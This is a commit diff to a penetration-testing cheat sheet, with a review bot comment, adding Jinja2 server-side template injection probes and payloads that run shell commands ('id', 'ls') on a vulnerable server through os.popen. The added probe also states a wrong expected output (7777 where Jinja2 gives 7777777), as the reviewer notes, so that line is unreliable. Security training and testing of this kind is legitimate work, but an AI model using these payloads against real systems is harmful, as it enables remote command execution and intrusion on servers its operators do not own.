Update Cheat Sheet.md

ARZ 2021-08-29 14:01:41 +05:00 committed by GitHub
parent 1d8de3060a
commit 917a58e08a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -512,10 +512,13 @@ If we can read log files,we can poison them to get RCE<br />
### SSTI (Server Side Template Injection) ### SSTI (Server Side Template Injection)
#### Jinja2 #### Jinja2
To check if it's jinja test`{{7*'7'}}` this would return 7777
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/> Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}`
**Exploit** **Exploit**
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}` `{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
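
Review bot: The expected output on the added Jinja2 check line is wrong: `{{7*'7'}}` repeats the string '7' seven times in Python, so Jinja2 renders 7777777, not 7777. That line is also missing the space between "test" and the backtick and the trailing `<br />` that the neighbouring lines use, so it will run into the `{{4*4}}` line when rendered. The added `popen('id')` line sits above the **Exploit** heading with no description; move it below that heading beside the existing `config.__class__` entry and add a short note on when each applies.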